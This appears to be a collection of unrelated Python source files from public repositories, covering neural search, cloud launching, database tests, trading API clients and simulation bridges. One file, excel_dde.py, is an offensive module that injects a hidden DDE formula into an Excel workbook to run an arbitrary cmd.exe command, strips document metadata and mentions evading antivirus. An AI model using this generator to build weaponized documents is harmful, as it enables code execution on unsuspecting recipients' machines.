model(fluid.dygraph.Layer): A dynamic graph module whose sub-modules should contain
one instance of `OneShotSuperNet` at least.
eval_func(function): A callback function which accept model and tokens as arguments.
strategy(str): The name of strategy used to search. Default: 'sa'.
search_steps(int): The total steps for searching.
Returns:
list<int>: The best tokens searched.
"""
super_net = None
for layer in model.sublayers(include_sublayers=False):
print("layer: {}".format(layer))
if isinstance(layer, OneShotSuperNet):
super_net = layer
break
assert super_net is not None
controller = None
if strategy == "sa":
contoller = SAController(
range_table=super_net.range_table(),
init_tokens=super_net.init_tokens())
assert (controller is not None, "Unsupported searching strategy.")
for i in range(search_steps):
tokens = contoller.next_tokens()
reward = eval_func(model, tokens)
contoller.update(tokens, reward, i)
return contoller.best_tokens()
class OneShotSuperNet(fluid.dygraph.Layer):
"""The base class of super net used in one-shot searching strategy.
A super net is a dygraph layer.
Args:
name_scope(str): The name scope of super net.
"""
def __init__(self, name_scope):
super(OneShotSuperNet, self).__init__(name_scope)
def init_tokens(self):
"""Get init tokens in search space.
Returns:
lis<int>t: The init tokens which is a list of integer.
"""
raise NotImplementedError('Abstract method.')
def range_table(self):
"""Get range table of current search space.
Returns:
range_table(tuple): The maximum value and minimum value in each position of tokens
with format `(min_values, max_values)`. The `min_values` is
a list of integers indicating the minimum values while `max_values`
indicating the maximum values.
"""
raise NotImplementedError('Abstract method.')
def _forward_impl(self, *inputs, **kwargs):
"""Defines the computation performed at every call.
Should be overridden by all subclasses.
Args:
inputs(tuple): unpacked tuple arguments
kwargs(dict): unpacked dict arguments
"""
raise NotImplementedError('Abstract method.')
def forward(self, input, tokens=None):
"""
Defines the computation performed at every call.
Args:
input(variable): The input of super net.
tokens(list): The tokens used to generate a sub-network.
None means computing in super net training mode.
Otherwise, it will execute the sub-network generated by tokens.
The `tokens` should be set in searching stage and final training stage.
Default: None.
Returns:
Varaible: The output of super net.
"""
if tokens == None:
tokens = self._random_tokens()
return self._forward_impl(input, tokens=tokens)
def _random_tokens(self):
tokens = []
for min_v, max_v in zip(self.range_table()[0], self.range_table()[1]):
tokens.append(np.random.randint(min_v, max_v))
return tokens
|
ch06/atomic-cloud/ec2atomic.py
|
nhonaitran/docbook
| 244 |
102890
|
#!/usr/bin/env python
import os
from libcloud.compute.types import Provider
from libcloud.compute.providers import get_driver
ACCESS_ID = os.getenv('AWSAccessKeyId')
SECRET_KEY = os.getenv('AWSSecretKey')
IMAGE_ID = 'ami-05513b72'
SIZE_ID = 't2.micro'
cls = get_driver(Provider.EC2_EU_WEST)
driver = cls(ACCESS_ID, SECRET_KEY)
sizes = driver.list_sizes()
images = driver.list_images()
size = [s for s in sizes if s.id == SIZE_ID][0]
image = [i for i in images if i.id == IMAGE_ID][0]
#Reads cloud config file
userdata = "\n".join(open('./cloud.cfg').readlines())
#Replace the name of the ssh key pair with yours
#You will need to open SSH port 22 on your default security group
name = "atomic"
node = driver.create_node(name=name, image=image,size=size,ex_keyname='atomic',ex_userdata=userdata)
snap, ip = driver.wait_until_running(nodes=[node])[0]
print ip[0]
|
backend/src/baserow/contrib/database/formula/parser/exceptions.py
|
lucastm/baserow
| 839 |
102902
|
from baserow.contrib.database.formula.exceptions import BaserowFormulaException
class InvalidNumberOfArguments(BaserowFormulaException):
def __init__(self, function_def, num_args):
if num_args == 1:
error_prefix = "1 argument was"
else:
error_prefix = f"{num_args} arguments were"
super().__init__(
f"{error_prefix} given to the {function_def}, it must instead "
f"be given {function_def.num_args}"
)
class MaximumFormulaSizeError(BaserowFormulaException):
def __init__(self):
super().__init__("it exceeded the maximum formula size")
class UnknownFieldByIdReference(BaserowFormulaException):
def __init__(self, unknown_field_id):
super().__init__(
f"there is no field with id {unknown_field_id} but the formula"
f" included a direct reference to it"
)
class UnknownOperator(BaserowFormulaException):
def __init__(self, operatorText):
super().__init__(f"it used the unknown operator {operatorText}")
class BaserowFormulaSyntaxError(BaserowFormulaException):
pass
|
tests/triggers_timer_based_trigger_control/test.py
|
JoshTDN03/knix
| 167 |
102913
|
# Copyright 2020 The KNIX Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
import random
import sys
import time
import unittest
import socket
import os
import subprocess
sys.path.append("../")
from mfn_test_utils import MFNTest
print("Starting rabbitmq")
rabbit = subprocess.Popen(["scripts/run_local_rabbitmq.sh"])
time.sleep(20)
print("Starting publisher")
pub = subprocess.Popen(["scripts/run_local_publisher.sh"])
time.sleep(10)
os.system("scripts/run_local_subscriber.sh")
print("Publisher is ready")
class TriggersAmqpTest(unittest.TestCase):
# @unittest.skip("")
def test_triggers_timer_based_trigger_control(self):
test = MFNTest(test_name='triggers_timer_based_trigger_control',
workflow_filename='wf_triggers_timer_based_trigger_control.json')
time.sleep(5)
print("Executing test")
# ["wf_triggers_timer_based_trigger_control", "trigger_amqp_to_be_controlled_nonce", "amqp://rabbituser:rabbitpass@paarijaat-debian-vm:5672/%2frabbitvhost", "rabbit.*.*", "egress_exchange", "trigger_timer_controller_nonce", 20000]
nonce = str(int(time.time() * 1000))
curr_hostname = socket.gethostname()
input_data = []
workflowname = "wf_triggers_timer_based_trigger_control"
trigger_name_amqp = "trigger_amqp_to_be_controlled_" + nonce
amqp_addr = "amqp://rabbituser:rabbitpass@" + curr_hostname + ":5672/%2frabbitvhost"
routingkey = "rabbit.*.*"
routingkey_to_expect = "rabbit.routing.key"
exchange = "egress_exchange"
trigger_name_timer = "trigger_timer_controller_" + nonce
ttl = 20000
input_data.append(workflowname)
input_data.append(trigger_name_amqp)
input_data.append(amqp_addr)
input_data.append(routingkey)
input_data.append(exchange)
input_data.append(trigger_name_timer)
input_data.append(ttl)
response = test.execute(input_data)
time.sleep((float(ttl)/1000.0) + 10)
print("Shutting down rabbitmq and publisher")
pub.terminate()
rabbit.terminate()
subprocess.Popen(["scripts/stop_local_rabbitmq.sh"])
time.sleep(5)
counter_state_1 = 0
counter_state_2 = 0
counter_state_1_error = 0
counter_state_2_error = 0
logs = test.get_workflow_logs()
wflog = logs["log"]
log_lines = wflog.split("\n")
for line in log_lines:
if "_!_TRIGGER_START_" + trigger_name_amqp + ";timer_based_trigger_control;" + workflowname + ";" + routingkey_to_expect + ";" in line.strip():
counter_state_1 = counter_state_1 + 1
print(line.strip())
if "_!_TRIGGER_ERROR_" + trigger_name_amqp + ";timer_based_trigger_control;" + workflowname + ";;" in line.strip():
counter_state_1_error = counter_state_1_error + 1
print(line.strip())
if "_!_TRIGGER_START_" + trigger_name_timer + ";timer_based_trigger_control_state2;" + workflowname + ";;" in line.strip():
counter_state_2 = counter_state_2 + 1
print(line.strip())
if "_!_TRIGGER_ERROR_" + trigger_name_timer + ";timer_based_trigger_control_state2;" + workflowname + ";;" in line.strip():
counter_state_2_error = counter_state_2_error + 1
print(line.strip())
if counter_state_1 >=20 and counter_state_2 == 1 and counter_state_1_error == 0 and counter_state_2_error == 0:
print("Number of state1 triggers: " + str(counter_state_1))
print("Number of state2 triggers: " + str(counter_state_2))
print("Number of state1 error triggers: " + str(counter_state_1_error))
print("Number of state1 error triggers: " + str(counter_state_2_error))
test.report(True, str(input_data), input_data, response)
else:
print("Number of state1 triggers: " + str(counter_state_1))
print("Number of state2 triggers: " + str(counter_state_2))
print("Number of state1 error triggers: " + str(counter_state_1_error))
print("Number of state1 error triggers: " + str(counter_state_2_error))
test.report(False, str(input_data), input_data, response)
for line in log_lines:
print(line.strip())
test.undeploy_workflow()
test.cleanup()
|
src/modules/excel_dde.py
|
mehrdad-shokri/macro_pack
| 1,550 |
102915
|
<filename>src/modules/excel_dde.py
#!/usr/bin/env python
# encoding: utf-8
# Only enabled on windows
import sys
from collections import OrderedDict
if sys.platform == "win32":
# Download and install pywin32 from https://sourceforge.net/projects/pywin32/files/pywin32/
import win32com.client # @UnresolvedImport
import logging
from modules.excel_gen import ExcelGenerator
from common import utils
class ExcelDDE(ExcelGenerator):
"""
Module used to generate MS ecel file with DDE object attack
"""
def run(self):
logging.info(" [+] Generating MS Excel with DDE document...")
try:
# Get command line
paramDict = OrderedDict([("Cmd_Line",None)])
self.fillInputParams(paramDict)
command = paramDict["Cmd_Line"]
logging.info(" [-] Open document...")
# open up an instance of Excel with the win32com driver\ \\
excel = win32com.client.Dispatch("Excel.Application")
# do the operation in background without actually opening Excel
#excel.Visible = False
workbook = excel.Workbooks.Open(self.outputFilePath)
logging.info(" [-] Inject DDE field (Answer 'No' to popup)...")
ddeCmd = r"""=MSEXCEL|'\..\..\..\Windows\System32\cmd.exe /c %s'!A1""" % command.rstrip()
excel.Cells(1, 26).Formula = ddeCmd
excel.Cells(1, 26).FormulaHidden = True
# Remove Informations
logging.info(" [-] Remove hidden data and personal info...")
xlRDIAll=99
workbook.RemoveDocumentInformation(xlRDIAll)
logging.info(" [-] Save Document...")
excel.DisplayAlerts=False
excel.Workbooks(1).Close(SaveChanges=1)
excel.Application.Quit()
# garbage collection
del excel
logging.info(" [-] Generated %s file path: %s" % (self.outputFileType, self.outputFilePath))
except Exception:
logging.exception(" [!] Exception caught!")
logging.error(" [!] Hints: Check if MS office is really closed and Antivirus did not catch the files")
logging.error(" [!] Attempt to force close MS Excel applications...")
objExcel = win32com.client.Dispatch("Excel.Application")
objExcel.Application.Quit()
del objExcel
# If it Application.Quit() was not enough we force kill the process
if utils.checkIfProcessRunning("Excel.exe"):
utils.forceProcessKill("Excel.exe")
|
functests/test_events.py
|
webfolderio/akumuli
| 1,094 |
102917
|
<gh_stars>1000+
from __future__ import print_function
import os
import sys
import socket
import datetime
import time
import akumulid_test_tools as att
from akumulid_test_tools import retry, api_test, on_exit
import json
try:
from urllib2 import urlopen, HTTPError, URLError
except ImportError:
from urllib import urlopen, HTTPError, URLError
import traceback
import itertools
import math
HOST = '127.0.0.1'
TCPPORT = 8282
HTTPPORT = 8181
allevents = []
@api_test("select-events forward")
def test_select_events_forward(dtstart, delta, N):
"""Read events in forward direction"""
nseries = 10
begin = dtstart
end = dtstart + delta*(N + 1)
query = {
"select-events": "!foo",
"range": {
"from": begin.strftime('%Y%m%dT%H%M%S.%f'),
"to": end.strftime('%Y%m%dT%H%M%S.%f'),
},
"order-by": "time",
"output": { "format": "csv" }
}
queryurl = "http://{0}:{1}/api/query".format(HOST, HTTPPORT)
response = urlopen(queryurl, json.dumps(query))
iterations = 0
for line in response:
try:
expts, expname = allevents[iterations]
columns = line.split(',')
timestamp = att.parse_timestamp(columns[1].strip())
event = columns[2].lstrip().rstrip('\n')
if timestamp != expts:
print("Unexpected timestamp in line {0}".format(line))
raise ValueError("Wrong timestamp {0}, expected {1}".format(str(timestamp), str(expts)))
if expname != event:
print("Unexpected value in line {0}".format(line))
raise ValueError("Wrong value {0}, expected {1}".format(event, expname))
iterations += 1
except:
print("Error at line: {0}".format(line))
raise
if iterations != len(allevents):
raise ValueError("Results incomplete, {0} received, {1} expected".format(iterations, len(allevents)))
@api_test("select-events backward")
def test_select_events_backward(dtstart, delta, N):
"""Read events in backward direction"""
nseries = 10
end = dtstart - delta
begin = dtstart + delta*(N + 1)
query = {
"select-events": "!foo",
"range": {
"from": begin.strftime('%Y%m%dT%H%M%S.%f'),
"to": end.strftime('%Y%m%dT%H%M%S.%f'),
},
"order-by": "time",
"output": { "format": "csv" }
}
queryurl = "http://{0}:{1}/api/query".format(HOST, HTTPPORT)
response = urlopen(queryurl, json.dumps(query))
iterations = 0
for line in response:
try:
expts, expname = allevents[-(iterations + 1)]
columns = line.split(',')
timestamp = att.parse_timestamp(columns[1].strip())
event = columns[2].lstrip().rstrip('\n')
if timestamp != expts:
print("Unexpected timestamp in line {0}".format(line))
raise ValueError("Wrong timestamp {0}, expected {1}".format(str(timestamp), str(expts)))
if expname != event:
print("Unexpected value in line {0}".format(line))
raise ValueError("Wrong value {0}, expected {1}".format(event, expname))
iterations += 1
except:
print("Error at line: {0}".format(line))
raise
if iterations != len(allevents):
raise ValueError("Results incomplete, {0} received, {1} expected".format(iterations, len(allevents)))
def main(path):
akumulid = att.create_akumulid(path)
# Reset database
akumulid.delete_database()
akumulid.create_database()
# start ./akumulid server
print("Starting server...")
akumulid.serve()
time.sleep(5)
try:
chan = att.TCPChan(HOST, TCPPORT)
# fill data in
dt = datetime.datetime.utcnow().replace(hour=0, minute=0, second=10, microsecond=0)
delta = datetime.timedelta(seconds=1)
nmsgs = 1000
snames = [
'!foo A=1 B=1',
'!foo A=1 B=2',
'!foo A=2 B=1',
'!foo A=2 B=2',
]
print("Sending {0} messages through TCP...".format(nmsgs*len(snames)))
cnt = 0
timestamp = dt
for it in range(0, nmsgs):
for sname in snames:
timestr = timestamp.strftime('+%Y%m%dT%H%M%S.%f')
event = "{0} event {1} for {2} generated".format(cnt, sname, timestr)
msg = "+{0}\r\n+{1}\r\n+{2}\r\n".format(sname, timestr, event[:it + 1])
allevents.append((timestamp, event[:it + 1]))
chan.send(msg)
cnt += 1
timestamp = timestamp + delta
time.sleep(5) # wait untill all messagess will be processed
test_select_events_forward(dt, delta, nmsgs*len(snames))
test_select_events_backward(dt, delta, nmsgs*len(snames))
finally:
print("Stopping server...")
akumulid.stop()
time.sleep(5)
on_exit()
if __name__ == '__main__':
print(' '.join(sys.argv))
if len(sys.argv) < 2:
print("Not enough arguments")
sys.exit(1)
main(sys.argv[1])
else:
raise ImportError("This module shouldn't be imported")
|
nsot/api/routers.py
|
comerford/nsot
| 387 |
102930
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from __future__ import absolute_import
from rest_framework_bulk.routes import BulkRouter
from rest_framework_nested.routers import NestedSimpleRouter
__all__ = ('BulkRouter', 'BulkNestedRouter')
# Map of HTTP verbs to rest_framework_bulk operations.
BULK_OPERATIONS_MAP = {
'put': 'bulk_update',
'patch': 'partial_bulk_update',
'delete': 'bulk_destroy',
}
class BulkNestedRouter(NestedSimpleRouter):
"""
Bulk-enabled nested router.
"""
def __init__(self, *args, **kwargs):
super(BulkNestedRouter, self).__init__(*args, **kwargs)
self.routes[0].mapping.update(BULK_OPERATIONS_MAP)
|
Co-Simulation/PTV-Vissim/vissim_integration/bridge_helper.py
|
adelbennaceur/carla
| 7,883 |
102943
|
#!/usr/bin/env python
# Copyright (c) 2020 Computer Vision Center (CVC) at the Universitat Autonoma de
# Barcelona (UAB).
#
# This work is licensed under the terms of the MIT license.
# For a copy, see <https://opensource.org/licenses/MIT>.
""" This module provides a helper for the co-simulation between vissim and carla. """
# ==================================================================================================
# -- imports ---------------------------------------------------------------------------------------
# ==================================================================================================
import logging
import math
import random
import carla # pylint: disable=import-error
# ==================================================================================================
# -- Bridge helper (VISSIM <=> CARLA) --------------------------------------------------------------
# ==================================================================================================
class BridgeHelper(object):
"""
BridgeHelper provides methos to ease the co-simulation between vissim and carla.
"""
blueprint_library = []
vtypes = {}
@staticmethod
def get_carla_transform(in_vissim_transform, extent=None):
"""
Returns carla transform based on vissim transform.
"""
in_location = in_vissim_transform.location
in_rotation = in_vissim_transform.rotation
# From front-center-bumper to center (vissim reference system).
if extent is not None:
out_location = (in_location.x - math.cos(math.radians(in_rotation.yaw)) * extent.x,
in_location.y - math.sin(math.radians(in_rotation.yaw)) * extent.x,
in_location.z - math.sin(math.radians(in_rotation.pitch)) * extent.x)
else:
out_location = (in_location.x, in_location.y, in_location.z)
out_rotation = (in_rotation.pitch, in_rotation.yaw, in_rotation.roll)
# Transform to carla reference system (left-handed system).
out_transform = carla.Transform(
carla.Location(out_location[0], -out_location[1], out_location[2]),
carla.Rotation(out_rotation[0], -out_rotation[1], out_rotation[2]))
return out_transform
@staticmethod
def get_vissim_transform(in_carla_transform, extent=None):
"""
Returns vissim transform based on carla transform.
"""
in_location = in_carla_transform.location
in_rotation = in_carla_transform.rotation
# From center to front-center-bumper (carla reference system).
if extent is not None:
yaw = -1 * in_rotation.yaw
pitch = in_rotation.pitch
out_location = (in_location.x + math.cos(math.radians(yaw)) * extent.x,
in_location.y - math.sin(math.radians(yaw)) * extent.x,
in_location.z - math.sin(math.radians(pitch)) * extent.x)
else:
out_location = (in_location.x, in_location.y, in_location.z)
out_rotation = (in_rotation.pitch, in_rotation.yaw, in_rotation.roll)
# Transform to vissim reference system (right-handed system).
out_transform = carla.Transform(
carla.Location(out_location[0], -out_location[1], out_location[2]),
carla.Rotation(out_rotation[0], -out_rotation[1], out_rotation[2]))
return out_transform
@staticmethod
def _flip_y(in_vector):
"""
Flips y coordinate of the given vector.
"""
return carla.Vector3D(in_vector.x, -in_vector.y, in_vector.z)
@staticmethod
def get_carla_velocity(in_vissim_velocity):
"""
Returns carla velocity based on vissim velocity.
"""
return BridgeHelper._flip_y(in_vissim_velocity)
@staticmethod
def get_vissim_velocity(in_carla_velocity):
"""
Returns vissim velocity based on carla velocity.
"""
return BridgeHelper._flip_y(in_carla_velocity)
@staticmethod
def _get_recommended_carla_blueprint(vissim_actor):
"""
Returns an appropriate blueprint based on the given vissim actor.
"""
blueprint = BridgeHelper.blueprint_library.filter('vehicle.seat.leon')[0]
color = random.choice(blueprint.get_attribute('color').recommended_values)
blueprint.set_attribute('color', color)
return blueprint
@staticmethod
def get_carla_blueprint(vissim_actor):
"""
Returns an appropriate blueprint based on the received vissim actor.
"""
type_id = str(vissim_actor.type)
if type_id in BridgeHelper.vtypes:
candidates = BridgeHelper.vtypes[type_id]
if candidates:
blueprint_id = random.choice(candidates)
else:
logging.error(
'vissim type %s not supported. No vehicle will be spawned in carla', type_id)
return None
blueprint = BridgeHelper.blueprint_library.filter(blueprint_id)
if not blueprint:
logging.error(
'carla blueprint %s unknown. No vehicle will be spawned', blueprint_id)
return None
blueprint = blueprint[0]
if blueprint.has_attribute('color'):
color = random.choice(blueprint.get_attribute('color').recommended_values)
blueprint.set_attribute('color', color)
if blueprint.has_attribute('driver_id'):
driver_id = random.choice(blueprint.get_attribute('driver_id').recommended_values)
blueprint.set_attribute('driver_id', driver_id)
blueprint.set_attribute('role_name', 'vissim_driver')
return blueprint
else:
logging.error(
'vissim type %s unknown. No vehicle will be spawned in carla', type_id)
return None
|
scripts/generate_example.py
|
joeranbosma/nnDetection
| 242 |
102945
|
"""
Copyright 2020 Division of Medical Image Computing, German Cancer Research Center (DKFZ), Heidelberg, Germany
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import os
import random
import argparse
from pathlib import Path
from multiprocessing import Pool
from itertools import repeat
import numpy as np
import SimpleITK as sitk
from loguru import logger
from nndet.io import save_json
from nndet.utils.check import env_guard
# # 2D example
# [Ignore, Not supported]
# dim = 2
# image_size = [512, 512]
# object_size = [32, 64]
# object_width = 6
# num_images_tr = 100
# num_images_ts = 100
# 3D example
dim = 3
image_size = [256, 256, 256]
object_size = [16, 32]
object_width = 4
def generate_image(image_dir, label_dir, idx):
random.seed(idx)
np.random.seed(idx)
logger.info(f"Generating case_{idx}")
selected_size = np.random.randint(object_size[0], object_size[1])
selected_class = np.random.randint(0, 2)
data = np.random.rand(*image_size)
mask = np.zeros_like(data)
top_left = [np.random.randint(0, image_size[i] - selected_size) for i in range(dim)]
if selected_class == 0:
slicing = tuple([slice(tp, tp + selected_size) for tp in top_left])
data[slicing] = data[slicing] + 0.4
data = data.clip(0, 1)
mask[slicing] = 1
elif selected_class == 1:
slicing = tuple([slice(tp, tp + selected_size) for tp in top_left])
inner_slicing = [slice(tp + object_width, tp + selected_size - object_width) for tp in top_left]
if len(inner_slicing) == 3:
inner_slicing[0] = slice(0, image_size[0])
inner_slicing = tuple(inner_slicing)
object_mask = np.zeros_like(mask).astype(bool)
object_mask[slicing] = 1
object_mask[inner_slicing] = 0
data[object_mask] = data[object_mask] + 0.4
data = data.clip(0, 1)
mask[object_mask] = 1
else:
raise NotImplementedError
if dim == 2:
data = data[None]
mask = mask[None]
data_itk = sitk.GetImageFromArray(data)
mask_itk = sitk.GetImageFromArray(mask)
mask_meta = {
"instances": {
"1": selected_class
},
}
sitk.WriteImage(data_itk, str(image_dir / f"case_{idx}_0000.nii.gz"))
sitk.WriteImage(mask_itk, str(label_dir / f"case_{idx}.nii.gz"))
save_json(mask_meta, label_dir / f"case_{idx}.json")
@env_guard
def main():
"""
Generate an example dataset for nnDetection to test the installation or
experiment with ideas.
"""
parser = argparse.ArgumentParser()
parser.add_argument(
'--full',
help="Increase size of dataset. "
"Default sizes train/test 10/10 and full 1000/1000.",
action='store_true',
)
parser.add_argument(
'--num_processes',
help="Use multiprocessing to create dataset.",
type=int,
default=0,
)
args = parser.parse_args()
full = args.full
num_processes = args.num_processes
num_images_tr = 1000 if full else 10
num_images_ts = 1000 if full else 10
meta = {
"task": f"Task000D{dim}_Example",
"name": "Example",
"target_class": None,
"test_labels": True,
"labels": {"0": "Square", "1": "SquareHole"},
"modalities": {"0": "MRI"},
"dim": dim,
}
# setup paths
data_task_dir = Path(os.getenv("det_data")) / meta["task"]
data_task_dir.mkdir(parents=True, exist_ok=True)
save_json(meta, data_task_dir / "dataset.json")
raw_splitted_dir = data_task_dir / "raw_splitted"
images_tr_dir = raw_splitted_dir / "imagesTr"
images_tr_dir.mkdir(parents=True, exist_ok=True)
labels_tr_dir = raw_splitted_dir / "labelsTr"
labels_tr_dir.mkdir(parents=True, exist_ok=True)
images_ts_dir = raw_splitted_dir / "imagesTs"
images_ts_dir.mkdir(parents=True, exist_ok=True)
labels_ts_dir = raw_splitted_dir / "labelsTs"
labels_ts_dir.mkdir(parents=True, exist_ok=True)
if num_processes == 0:
for idx in range(num_images_tr):
generate_image(
images_tr_dir,
labels_tr_dir,
idx,
)
for idx in range(num_images_tr, num_images_tr + num_images_ts):
generate_image(
images_ts_dir,
labels_ts_dir,
idx,
)
else:
logger.info("Using multiprocessing to create example dataset.")
with Pool(processes=num_processes) as p:
p.starmap(
generate_image,
zip(
repeat(images_tr_dir),
repeat(labels_tr_dir),
range(num_images_tr),
)
)
with Pool(processes=num_processes) as p:
p.starmap(
generate_image,
zip(
repeat(images_ts_dir),
repeat(labels_ts_dir),
range(num_images_tr, num_images_tr + num_images_ts),
)
)
if __name__ == '__main__':
main()
|
vectorhub/encoders/text/base.py
|
vector-ai/vectorhub
| 385 |
102966
|
<reponame>vector-ai/vectorhub<filename>vectorhub/encoders/text/base.py
"""
Base Text2Vec Model
"""
import warnings
from ...base import Base2Vec
from abc import ABC, abstractmethod
from typing import Union, List, Dict
class BaseText2Vec(Base2Vec, ABC):
def read(self, text: str):
"""An abstract method to specify the read method to read the data.
"""
pass
@property
def test_word(self):
return "dummy word"
@property
def vector_length(self):
"""
Set the vector length of the model.
"""
if hasattr(self, "_vector_length"):
return self._vector_length
else:
print(f"The vector length is not explicitly stated so we are inferring " + \
"from our test word - {self.test_word}.")
setattr(self, "_vector_length", len(self.encode(self.test_word)))
return self._vector_length
@vector_length.setter
def vector_length(self, value):
self._vector_length = value
@abstractmethod
def encode(self, words: Union[List[str]]):
pass
|
quant/platform/huobi.py
|
vincent87lee/alphahunter
| 149 |
102986
|
# -*- coding:utf-8 -*-
"""
huobi Trade module.
https://huobiapi.github.io/docs/spot/v1/cn
Project: alphahunter
Author: HJQuant
Description: Asynchronous driven quantitative trading framework
"""
import json
import hmac
import copy
import gzip
import base64
import urllib
import hashlib
import datetime
from urllib import parse
from urllib.parse import urljoin
from collections import defaultdict, deque
from typing import DefaultDict, Deque, List, Dict, Tuple, Optional, Any
from quant.gateway import ExchangeGateway
from quant.state import State
from quant.utils import tools, logger
from quant.const import MARKET_TYPE_KLINE, INDICATE_ORDER, INDICATE_ASSET, INDICATE_POSITION
from quant.order import Order, Fill, SymbolInfo
from quant.position import Position
from quant.asset import Asset
from quant.tasks import SingleTask, LoopRunTask
from quant.utils.websocket import Websocket
from quant.utils.decorator import async_method_locker
from quant.utils.http_client import AsyncHttpRequests
from quant.order import ORDER_ACTION_BUY, ORDER_ACTION_SELL
from quant.order import ORDER_TYPE_LIMIT, ORDER_TYPE_MARKET, ORDER_TYPE_IOC
from quant.order import LIQUIDITY_TYPE_MAKER, LIQUIDITY_TYPE_TAKER
from quant.order import ORDER_STATUS_SUBMITTED, ORDER_STATUS_PARTIAL_FILLED, ORDER_STATUS_FILLED, ORDER_STATUS_CANCELED, ORDER_STATUS_FAILED
from quant.market import Kline, Orderbook, Trade, Ticker
from quant.trader import Trader
__all__ = ("HuobiRestAPI", "HuobiTrader", )
class HuobiRestAPI:
""" huobi REST API 封装
"""
def __init__(self, host, access_key, secret_key):
""" 初始化
@param host 请求host
@param access_key API KEY
@param secret_key SECRET KEY
"""
self._host = host
self._access_key = access_key
self._secret_key = secret_key
self._account_id = None
async def get_symbols_info(self):
""" 获取所有交易对基础信息
@return data list 所有交易对基础信息
"""
return await self.request("GET", "/v1/common/symbols")
async def get_server_time(self):
""" 获取服务器时间
@return data int 服务器时间戳(毫秒)
"""
return await self.request("GET", "/v1/common/timestamp")
async def get_user_accounts(self):
""" 获取账户信息
"""
return await self.request("GET", "/v1/account/accounts", auth=True)
async def get_account_id(self):
""" 获取账户id
"""
if self._account_id:
return self._account_id
success, error = await self.get_user_accounts()
if error:
return None
for item in success:
if item["type"] == "spot":
self._account_id = str(item["id"])
return self._account_id
return None
async def get_account_balance(self):
""" 获取账户信息
"""
account_id = await self.get_account_id()
uri = "/v1/account/accounts/{account_id}/balance".format(account_id=account_id)
return await self.request("GET", uri, auth=True)
async def get_balance_all(self):
""" 母账户查询其下所有子账户的各币种汇总余额
"""
return await self.request("GET", "/v1/subuser/aggregate-balance", auth=True)
async def create_order(self, symbol, price, quantity, order_type):
""" 创建订单
@param symbol 交易对
@param quantity 交易量
@param price 交易价格
@param order_type 订单类型 buy-market, sell-market, buy-limit, sell-limit
@return order_no 订单id
"""
account_id = await self.get_account_id()
info = {
"account-id": account_id,
"price": price,
"amount": quantity,
"source": "api",
"symbol": symbol,
"type": order_type
}
if order_type == "buy-market" or order_type == "sell-market":
info.pop("price")
return await self.request("POST", "/v1/order/orders/place", body=info, auth=True)
async def revoke_order(self, order_no):
""" 撤销委托单
@param order_no 订单id
@return True/False
"""
uri = "/v1/order/orders/{order_no}/submitcancel".format(order_no=order_no)
return await self.request("POST", uri, auth=True)
async def revoke_orders(self, order_nos):
""" 批量撤销委托单
@param order_nos 订单列表
* NOTE: 单次不超过50个订单id
"""
body = {
"order-ids": order_nos
}
return await self.request("POST", "/v1/order/orders/batchcancel", body=body, auth=True)
async def get_open_orders(self, symbol):
""" 获取当前还未完全成交的订单信息
@param symbol 交易对
* NOTE: 查询上限最多500个订单
"""
account_id = await self.get_account_id()
params = {
"account-id": account_id,
"symbol": symbol,
"size": 500
}
return await self.request("GET", "/v1/order/openOrders", params=params, auth=True)
async def get_order_status(self, order_no):
""" 获取订单的状态
@param order_no 订单id
"""
uri = "/v1/order/orders/{order_no}".format(order_no=order_no)
return await self.request("GET", uri, auth=True)
async def request(self, method, uri, params=None, body=None, auth=False):
""" 发起请求
@param method 请求方法 GET POST
@param uri 请求uri
@param params dict 请求query参数
@param body dict 请求body数据
"""
url = urljoin(self._host, uri)
params = params if params else {}
if auth:
timestamp = datetime.datetime.utcnow().strftime("%Y-%m-%dT%H:%M:%S")
params.update({"AccessKeyId": self._access_key,
"SignatureMethod": "HmacSHA256",
"SignatureVersion": "2",
"Timestamp": timestamp})
host_name = urllib.parse.urlparse(self._host).hostname.lower()
params["Signature"] = self.generate_signature(method, params, host_name, uri)
if method == "GET":
headers = {
"Content-type": "application/x-www-form-urlencoded",
"User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) "
"Chrome/39.0.2171.71 Safari/537.36"
}
else:
headers = {
"Accept": "application/json",
"Content-type": "application/json"
}
_, success, error = await AsyncHttpRequests.fetch(method, url, params=params, data=json.dumps(body), headers=headers, timeout=10)
if error:
return success, error
if success.get("status") != "ok":
return None, success
return success.get("data"), None
def generate_signature(self, method, params, host_url, request_path):
""" 创建签名
"""
query = "&".join(["{}={}".format(k, parse.quote(str(params[k]))) for k in sorted(params.keys())])
payload = [method, host_url, request_path, query]
payload = "\n".join(payload)
payload = payload.encode(encoding="utf8")
secret_key = self._secret_key.encode(encoding="utf8")
digest = hmac.new(secret_key, payload, digestmod=hashlib.sha256).digest()
signature = base64.b64encode(digest)
signature = signature.decode()
return signature
class HuobiTrader(Websocket, ExchangeGateway):
""" huobi Trade模块
"""
def __init__(self, **kwargs):
"""Initialize."""
self.cb = kwargs["cb"]
state = None
self._platform = kwargs.get("platform")
self._symbols = kwargs.get("symbols")
self._strategy = kwargs.get("strategy")
self._account = kwargs.get("account")
self._access_key = kwargs.get("access_key")
self._secret_key = kwargs.get("secret_key")
if not self._platform:
state = State(self._platform, self._account, "param platform miss")
elif self._account and (not self._access_key or not self._secret_key):
state = State(self._platform, self._account, "param access_key or secret_key miss")
elif not self._strategy:
state = State(self._platform, self._account, "param strategy miss")
elif not self._symbols:
state = State(self._platform, self._account, "param symbols miss")
if state:
logger.error(state, caller=self)
SingleTask.run(self.cb.on_state_update_callback, state)
return
self._host = "https://api.huobi.me"
self._wss = "wss://api.huobi.me"
url = self._wss + "/ws/v1"
super(HuobiTrader, self).__init__(url, send_hb_interval=0, **kwargs)
#self.heartbeat_msg = "ping"
